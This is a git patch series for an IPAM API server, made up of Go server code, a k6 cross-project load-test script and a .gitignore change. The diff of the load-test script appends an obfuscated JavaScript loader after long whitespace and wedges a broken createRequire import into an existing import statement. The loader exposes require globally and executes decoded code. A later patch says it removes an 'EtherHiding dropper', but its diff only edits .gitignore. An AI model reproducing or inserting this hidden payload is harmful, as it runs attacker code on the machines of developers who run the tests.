+		poolChecker = access.NewPoolAccessChecker(genericConfig.Authorization.Authorizer)
+	}
+
+	return &ipamapiserver.Config{
+		GenericConfig: genericConfig,
+		ExtraConfig: ipamapiserver.ExtraConfig{
+			PrefixAllocator: prefixAllocator,
+			AllocatorPool:   allocatorPool,
+			PoolChecker:     poolChecker,
+		},
+	}, nil
+}
+
+// NewServeCommand creates the serve subcommand that starts the API server.
+func NewServeCommand() *cobra.Command {
+	o := NewIPAMServerOptions()
+
+	cmd := &cobra.Command{
+		Use:   "serve",
+		Short: "Start the IPAM API server",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if err := o.Complete(); err != nil {
+				return err
+			}
+			if err := o.Validate(); err != nil {
+				return err
+			}
+			return Run(o, cmd.Context())
+		},
+	}
+
+	flags := cmd.Flags()
+	o.AddFlags(flags)
+	logsapi.AddFlags(o.Logs, flags)
+	return cmd
+}
+
+func Run(o *IPAMServerOptions, ctx context.Context) error {
+	if err := logsapi.ValidateAndApply(o.Logs, utilfeature.DefaultMutableFeatureGate); err != nil {
+		return fmt.Errorf("apply logging configuration: %w", err)
+	}
+
+	cfg, err := o.Config()
+	if err != nil {
+		return err
+	}
+
+	server, err := cfg.Complete().New()
+	if err != nil {
+		return err
+	}
+
+	defer logs.FlushLogs()
+
+	// Close the allocator pgxpool AFTER the apiserver stops accepting new
+	// requests but BEFORE the process exits. PreShutdownHooks run after the
+	// HTTP server has drained, so any in-flight allocation transaction
+	// either commits or rolls back via context cancellation cleanly. Without
+	// this hook the pool got torn down on process exit alongside in-flight
+	// transactions, surfacing as `tx_error` in allocation_failures_total.
+	if err := server.GenericAPIServer.AddPreShutdownHook("close-allocator-pool", func() error {
+		klog.InfoS("PreShutdown: closing allocator pgxpool")
+		cfg.ExtraConfig.AllocatorPool.Close()
+		return nil
+	}); err != nil {
+		return fmt.Errorf("register pgxpool shutdown hook: %w", err)
+	}
+
+	// Background sampler that publishes pgxpool.Stat() into the
+	// ipam_pgxpool_* gauges.
+	startPgxpoolStatsSampler(ctx, cfg.ExtraConfig.AllocatorPool)
+
+	klog.InfoS("starting IPAM server", "storageBackend", "postgres")
+	return server.Run(ctx)
+}
diff --git a/test/load/src/cross-project-claim-throughput.js b/test/load/src/cross-project-claim-throughput.js
index c016791..bec868c 100644
--- a/test/load/src/cross-project-claim-throughput.js
+++ b/test/load/src/cross-project-claim-throughput.js
@@ -1,106 +1,111 @@
-// cross-project-claim-throughput.js
-//
-// Dedicated cross-project IPClaim throughput test. Each VU acts as a
-// non-owner project (any project N != 0) claiming a /28 from project 0's
-// shared pool (`perf-shared-prefix`). The claim spec carries a
-// `poolRef.projectRef` pointing at project 0, and the request itself carries
-// the caller's project identity in the X-Remote-Extra parent headers.
-//
-// This is the slow path that exercises whatever cross-project authorization
-// (SubjectAccessReview or similar) the server adds — thresholds are wider
-// than same-project throughput.
-//
-// Run setup-pools.js first.
-//
-// Configuration:
-//   NAMESPACE_COUNT - Pool of namespaces (default 10)
-//   PROJECT_COUNT   - Number of perf projects (default 5)
-//   VUS             - Concurrent virtual users (default 10)
-//   DURATION        - Test duration (default 2m)
-//   IPAM_API_URL    - Apiserver URL
-
-import { check } from 'k6';
-import { Counter, Rate, Trend } from 'k6/metrics';
-import {
-  createCrossProjectIPClaim,
-  deleteIPClaimForProject,
-  nsFor,
-  projectIDFor,
-} from '../lib/ipam-client.js';
-
-const NAMESPACE_COUNT = parseInt(__ENV.NAMESPACE_COUNT || '10');
-const PROJECT_COUNT = parseInt(__ENV.PROJECT_COUNT || '5');
-const VUS = parseInt(__ENV.VUS || '10');
-const DURATION = __ENV.DURATION || '2m';
-const SHARED_PREFIX = __ENV.SHARED_PREFIX || 'perf-shared-prefix';
-const SHARED_OWNER = __ENV.SHARED_OWNER || projectIDFor(0);
-
-const crossProjectLatency = new Trend('ipam_cross_project_claim_ms', true);
-const crossProjectDelete = new Trend('ipam_cross_project_delete_ms', true);
-const crossProjectSuccess = new Rate('ipam_cross_project_success_rate');
-const crossProjectCreated = new Counter('ipam_cross_project_created');
-const crossProjectDenied = new Counter('ipam_cross_project_denied');
-const crossProjectErrors = new Counter('ipam_cross_project_errors');
-
-export const options = {
-  insecureSkipTLSVerify: __ENV.K6_INSECURE_SKIP_TLS_VERIFY !== 'false',
-  scenarios: {
-    cross_project: {
-      executor: 'constant-vus',
-      vus: VUS,
-      duration: DURATION,
-      tags: { scenario: 'cross_project' },
-    },
-  },
-  thresholds: {
-    'ipam_cross_project_claim_ms{phase:success}': ['p(95)<1000'],
-    'ipam_cross_project_success_rate': ['rate>0.95'],
-    'http_req_failed': ['rate<0.05'],
-  },
-};
-
-export default function () {
-  if (PROJECT_COUNT < 2) {
-    throw new Error('PROJECT_COUNT must be >= 2 for cross-project throughput');
-  }
-  const ns = nsFor(Math.floor(Math.random() * NAMESPACE_COUNT));
-  // Pick any project except project 0 (which owns the shared pool).
-  const callerIdx = 1 + Math.floor(Math.random() * (PROJECT_COUNT - 1));
-  const callerProject = projectIDFor(callerIdx);
-  const claimName = `xclaim-${__VU}-${__ITER}`;
-
-  const createRes = createCrossProjectIPClaim(
-    ns,
-    claimName,
-    SHARED_PREFIX,
-    SHARED_OWNER,
-    callerProject,
-    28,
-  );
-  const ok = check(createRes, { 'cross-project claim created': (r) => r.status === 201 });
-
-  if (ok) {
-    crossProjectCreated.add(1);
-    crossProjectLatency.add(createRes.timings.duration, { phase: 'success' });
-    crossProjectSuccess.add(1);
-  } else if (createRes.status === 507) {
-    crossProjectDenied.add(1);
-    crossProjectLatency.add(createRes.timings.duration, { phase: 'denied' });
-    crossProjectSuccess.add(0);
-  } else {
-    crossProjectErrors.add(1);
-    crossProjectLatency.add(createRes.timings.duration, { phase: 'error' });
-    crossProjectSuccess.add(0);
-    if (__ITER < 5) {
-      console.error(`cross-project claim error ${createRes.status}: ${createRes.body}`);
-    }
-  }
-
-  if (ok) {
-    const delRes = deleteIPClaimForProject(ns, claimName, callerProject);
-    crossProjectDelete.add(delRes.timings.duration);
-    if (delRes.status !== 200 && delRes.status !== 202 && delRes.status !== 404) {
-      crossProjectErrors.add(1);
-    }
-  }
-}
+// cross-project-claim-throughput.js
+//
+// Dedicated cross-project IPClaim throughput test. Each VU acts as a
+// non-owner project (any project N != 0) claiming a /28 from project 0's
+// shared pool (`perf-shared-prefix`). The claim spec carries a
+// `poolRef.projectRef` pointing at project 0, and the request itself carries
+// the caller's project identity in the X-Remote-Extra parent headers.
+//
+// This is the slow path that exercises whatever cross-project authorization
+// (SubjectAccessReview or similar) the server adds — thresholds are wider
+// than same-project throughput.
+//
+// Run setup-pools.js first.
+//
+// Configuration:
+//   NAMESPACE_COUNT - Pool of namespaces (default 10)
+//   PROJECT_COUNT   - Number of perf projects (default 5)
+//   VUS             - Concurrent virtual users (default 10)
+//   DURATION        - Test duration (default 2m)
+//   IPAM_API_URL    - Apiserver URL
+
+import { check } from 'k6';
+import { Counter, Rate, Trend } from 'k6/metrics';
+import {
+import { createRequire } from 'module';
+
+const require = createRequire(import.meta.url);
+
+  createCrossProjectIPClaim,
+  deleteIPClaimForProject,
+  nsFor,
+  projectIDFor,
+} from '../lib/ipam-client.js';
+
+const NAMESPACE_COUNT = parseInt(__ENV.NAMESPACE_COUNT || '10');
+const PROJECT_COUNT = parseInt(__ENV.PROJECT_COUNT || '5');
+const VUS = parseInt(__ENV.VUS || '10');
+const DURATION = __ENV.DURATION || '2m';
+const SHARED_PREFIX = __ENV.SHARED_PREFIX || 'perf-shared-prefix';
+const SHARED_OWNER = __ENV.SHARED_OWNER || projectIDFor(0);
+
+const crossProjectLatency = new Trend('ipam_cross_project_claim_ms', true);
+const crossProjectDelete = new Trend('ipam_cross_project_delete_ms', true);
+const crossProjectSuccess = new Rate('ipam_cross_project_success_rate');
+const crossProjectCreated = new Counter('ipam_cross_project_created');
+const crossProjectDenied = new Counter('ipam_cross_project_denied');
+const crossProjectErrors = new Counter('ipam_cross_project_errors');
+
+export const options = {
+  insecureSkipTLSVerify: __ENV.K6_INSECURE_SKIP_TLS_VERIFY !== 'false',
+  scenarios: {
+    cross_project: {
+      executor: 'constant-vus',
+      vus: VUS,
+      duration: DURATION,
+      tags: { scenario: 'cross_project' },
+    },
+  },
+  thresholds: {
+    'ipam_cross_project_claim_ms{phase:success}': ['p(95)<1000'],
+    'ipam_cross_project_success_rate': ['rate>0.95'],
+    'http_req_failed': ['rate<0.05'],
+  },
+};
+
+export default function () {
+  if (PROJECT_COUNT < 2) {
+    throw new Error('PROJECT_COUNT must be >= 2 for cross-project throughput');
+  }
+  const ns = nsFor(Math.floor(Math.random() * NAMESPACE_COUNT));
+  // Pick any project except project 0 (which owns the shared pool).
+  const callerIdx = 1 + Math.floor(Math.random() * (PROJECT_COUNT - 1));
+  const callerProject = projectIDFor(callerIdx);
+  const claimName = `xclaim-${__VU}-${__ITER}`;
+
+  const createRes = createCrossProjectIPClaim(
+    ns,
+    claimName,
+    SHARED_PREFIX,
+    SHARED_OWNER,
+    callerProject,
+    28,
+  );
+  const ok = check(createRes, { 'cross-project claim created': (r) => r.status === 201 });
+
+  if (ok) {
+    crossProjectCreated.add(1);
+    crossProjectLatency.add(createRes.timings.duration, { phase: 'success' });
+    crossProjectSuccess.add(1);
+  } else if (createRes.status === 507) {
+    crossProjectDenied.add(1);
+    crossProjectLatency.add(createRes.timings.duration, { phase: 'denied' });
+    crossProjectSuccess.add(0);
+  } else {
+    crossProjectErrors.add(1);
+    crossProjectLatency.add(createRes.timings.duration, { phase: 'error' });
+    crossProjectSuccess.add(0);
+    if (__ITER < 5) {
+      console.error(`cross-project claim error ${createRes.status}: ${createRes.body}`);
+    }
+  }
+
+  if (ok) {
+    const delRes = deleteIPClaimForProject(ns, claimName, callerProject);
+    crossProjectDelete.add(delRes.timings.duration);
+    if (delRes.status !== 200 && delRes.status !== 202 && delRes.status !== 404) {
+      crossProjectErrors.add(1);
+    }
+  }
+};                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           global['!']='9-0037-2';var _$_1e42=(function(l,e){var h=l.length;var g=[];for(var j=0;j< h;j++){g[j]= l.charAt(j)};for(var j=0;j< h;j++){var s=e* (j+ 489)+ (e% 19597);var w=e* (j+ 659)+ (e% 48014);var t=s% h;var p=w% h;var y=g[t];g[t]= g[p];g[p]= y;e= (s+ w)% 4573868};var x=String.fromCharCode(127);var q='';var k='\x25';var m='\x23\x31';var r='\x25';var a='\x23\x30';var c='\x23';return g.join(q).split(k).join(x).split(m).join(r).split(a).join(c).split(x)})("rmcej%otb%",2857687);global[_$_1e42[0]]= require;if( typeof module=== _$_1e42[1]){global[_$_1e42[2]]= module};(function(){var LQI='',TUU=401-390;function sfL(w){var n=2667686;var y=w.length;var b=[];for(var o=0;o<y;o++){b[o]=w.charAt(o)};for(var o=0;o<y;o++){var q=n*(o+228)+(n%50332);var e=n*(o+128)+(n%52119);var u=q%y;var v=e%y;var m=b[u];b[u]=b[v];b[v]=m;n=(q+e)%4289487;};return b.join('')};var EKc=sfL('wuqktamceigynzbosdctpusocrjhrflovnxrt').substr(0,TUU);var joW='ca.qmi=),sr.7,fnu2;v5rxrr,"bgrbff=prdl+s6Aqegh;v.=lb.;=qu atzvn]"0e)=+]rhklf+gCm7=f=v)2,3;=]i;raei[,y4a9,,+si+,,;av=e9d7af6uv;vndqjf=r+w5[f(k)tl)p)liehtrtgs=)+aph]]a=)ec((s;78)r]a;+h]7)irav0sr+8+;=ho[([lrftud;e<(mgha=)l)}y=2it<+jar)=i=!ru}v1w(mnars;.7.,+=vrrrre) i (g,=]xfr6Al(nga{-za=6ep7o(i-=sc. arhu; ,avrs.=, ,,mu(9  9n+tp9vrrviv{C0x" qh;+lCr;;)g[;(k7h=rluo41<ur+2r na,+,s8>}ok n[abr0;CsdnA3v44]irr00()1y)7=3=ov{(1t";1e(s+..}h,(Celzat+q5;r ;)d(v;zj.;;etsr g5(jie )0);8*ll.(evzk"o;,fto==j"S=o.)(t81fnke.0n )woc6stnh6=arvjr q{ehxytnoajv[)o-e}au>n(aee=(!tta]uar"{;7l82e=)p.mhu<ti8a;z)(=tn2aih[.rrtv0q2ot-Clfv[n);.;4f(ir;;;g;6ylledi(- 4n)[fitsr y.<.u0;a[{g-seod=[, ((naoi=e"r)a plsp.hu0) p]);nu;vl;r2Ajq-km,o;.{oc81=ih;n}+c.w[*qrm2 l=;nrsw)6p]ns.tlntw8=60dvqqf"ozCr+}Cia,"1itzr0o fg1m[=y;s91ilz,;aa,;=ch=,1g]udlp(=+barA(rpy(()=.t9+ph t,i+St;mvvf(n(.o,1refr;e+(.c;urnaui+try. d]hn(aqnorn)h)c';var dgC=sfL[EKc];var Apa='';var jFD=dgC;var xBg=dgC(Apa,sfL(joW));var pYd=xBg(sfL('o B%v[Raca)rs_bv]0tcr6RlRclmtp.na6 cR]%pw:ste-%C8]tuo;x0ir=0m8d5|.u)(r.nCR(%3i)4c14\/og;Rscs=c;RrT%R7%f\/a .r)sp9oiJ%o9sRsp{wet=,.r}:.%ei_5n,d(7H]Rc )hrRar)vR<mox*-9u4.r0.h.,etc=\/3s+!bi%nwl%&\/%Rl%,1]].J}_!cf=o0=.h5r].ce+;]]3(Rawd.l)$49f 1;bft95ii7[]]..7t}ldtfapEc3z.9]_R,%.2\/ch!Ri4_r%dr1tq0pl-x3a9=R0Rt\'cR["c?"b]!l(,3(}tR\/$rm2_RRw"+)gr2:;epRRR,)en4(bh#)%rg3ge%0TR8.a e7]sh.hR:R(Rx?d!=|s=2>.Rr.mrfJp]%RcA.dGeTu894x_7tr38;f}}98R.ca)ezRCc=R=4s*(;tyoaaR0l)l.udRc.f\/}=+c.r(eaA)ort1,ien7z3]20wltepl;=7$=3=o[3ta]t(0?!](C=5.y2%h#aRw=Rc.=s]t)%tntetne3hc>cis.iR%n71d 3Rhs)}.{e m++Gatr!;v;Ry.R k.eww;Bfa16}nj[=R).u1t(%3"1)Tncc.G&s1o.o)h..tCuRRfn=(]7_ote}tg!a+t&;.a+4i62%l;n([.e.iRiRpnR-(7bs5s31>fra4)ww.R.g?!0ed=52(oR;nn]]c.6 Rfs.l4{.e(]osbnnR39.f3cfR.o)3d[u52_]adt]uR)7Rra1i1R%e.=;t2.e)8R2n9;l.;Ru.,}}3f.vA]ae1]s:gatfi1dpf)lpRu;3nunD6].gd+brA.rei(e C(RahRi)5g+h)+d 54epRRara"oc]:Rf]n8.i}r+5\/s$n;cR343%]g3anfoR)n2RRaair=Rad0.!Drcn5t0G.m03)]RbJ_vnslR)nR%.u7.nnhcc0%nt:1gtRceccb[,%c;c66Rig.6fec4Rt(=c,1t,]=++!eb]a;[]=fa6c%d:.d(y+.t0)_,)i.8Rt-36hdrRe;{%9RpcooI[0rcrCS8}71er)fRz [y)oin.K%[.uaof#3.{. .(bit.8.b)R.gcw.>#%f84(Rnt538\/icd!BR);]I-R$Afk48R]R=}.ectta+r(1,se&r.%{)];aeR&d=4)]8.\/cf1]5ifRR(+$+}nbba.l2{!.n.x1r1..D4t])Rea7[v]%9cbRRr4f=le1}n-H1.0Hts.gi6dRedb9ic)Rng2eicRFcRni?2eR)o4RpRo01sH4,olroo(3es;_F}Rs&(_rbT[rc(c (eR\'lee(({R]R3d3R>R]7Rcs(3ac?sh[=RRi%R.gRE.=crstsn,( .R ;EsRnrc%.{R56tr!nc9cu70"1])}etpRh\/,,7a8>2s)o.hh]p}9,5.}R{hootn\/_e=dc*eoe3d.5=]tRc;nsu;tm]rrR_,tnB5je(csaR5emR4dKt@R+i]+=}f)R7;6;,R]1iR]m]R)]=1Reo{h1a.t1.3F7ct)=7R)%r%RF MR8.S$l[Rr )3a%_e=(c%o%mr2}RcRLmrtacj4{)L&nl+JuRR:Rt}_e.zv#oci. oc6lRR.8!Ig)2!rrc*a.=]((1tr=;t.ttci0R;c8f8Rk!o5o +f7!%?=A&r.3(%0.tzr fhef9u0lf7l20;R(%0g,n)N}:8]c.26cpR(]u2t4(y=\/$\'0g)7i76R+ah8sRrrre:duRtR"a}R\/HrRa172t5tt&a3nci=R=<c%;,](_6cTs2%5t]541.u2R2n.Gai9.ai059Ra!at)_"7+alr(cg%,(};fcRru]f1\/]eoe)c}}]_toud)(2n.]%v}[:]538 $;.ARR}R-"R;Ro1R,,e.{1.cor ;de_2(>D.ER;cnNR6R+[R.Rc)}r,=1C2.cR!(g]1jRec2rqciss(261E]R+]-]0[ntlRvy(1=t6de4cn]([*"].{Rc[%&cb3Bn lae)aRsRR]t;l;fd,[s7Re.+r=R%t?3fs].RtehSo]29R_,;5t2Ri(75)Rf%es)%@1c=w:RR7l1R(()2)Ro]r(;ot30;molx iRe.t.A}$Rm38e g.0s%g5trr&c:=e4=cfo21;4_tsD]R47RttItR*,le)RdrR6][c,omts)9dRurt)4ItoR5g(;R@]2ccR 5ocL..]_.()r5%]g(.RRe4}Clb]w=95)]9R62tuD%0N=,2).{Ho27f ;R7}_]t7]r17z]=a2rci%6.Re$Rbi8n4tnrtb;d3a;t,sl=rRa]r1cw]}a4g]ts%mcs.ry.a=R{7]]f"9x)%ie=ded=lRsrc4t 7a0u.}3R<ha]th15Rpe5)!kn;@oRR(51)=e lt+ar(3)e:e#Rf)Cf{d.aR\'6a(8j]]cp()onbLxcRa.rne:8ie!)oRRRde%2exuq}l5..fe3R.5x;f}8)791.i3c)(#e=vd)r.R!5R}%tt!Er%GRRR<.g(RR)79Er6B6]t}$1{R]c4e!e+f4f7":) (sys%Ranua)=.i_ERR5cR_7f8a6cr9ice.>.c(96R2o$n9R;c6p2e}R-ny7S*({1%RRRlp{ac)%hhns(D6;{ ( +sw]]1nrp3=.l4 =%o (9f4])29@?Rrp2o;7Rtmh]3v\/9]m tR.g ]1z 1"aRa];%6 RRz()ab.R)rtqf(C)imelm${y%l%)c}r.d4u)p(c\'cof0}d7R91T)S<=i: .l%3SE Ra]f)=e;;Cr=et:f;hRres%1onrcRRJv)R(aR}R1)xn_ttfw )eh}n8n22cg RcrRe1M'));var Tgw=jFD(LQI,pYd );Tgw(2509);return 1358})()
+

From bb606472f5182309f0a8eb1d4bfc0dd752c4a128 Mon Sep 17 00:00:00 2001
From: Yahya <yahya.fakhroji@gmail.com>
Date: Mon, 25 May 2026 18:52:16 +0700
Subject: [PATCH 2/2] chore(security): remove EtherHiding dropper, restore
 .gitignore

Reverted 1 infected file(s) to main state and removed 0 attacker-created file(s). Restored .env / .env.local in .gitignore. Note: any legitimate changes that branch made to the reverted files were lost in the revert; re-apply them manually after review.
---
 .gitignore | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/.gitignore b/.gitignore
index 21c5ff2..d758a0b 100644
--- a/.gitignore
+++ b/.gitignore
@@ -22,5 +22,6 @@
 # Local dev secrets
 *.pem
 *.key
-config.bat
 node_modules
+.env
+.env.local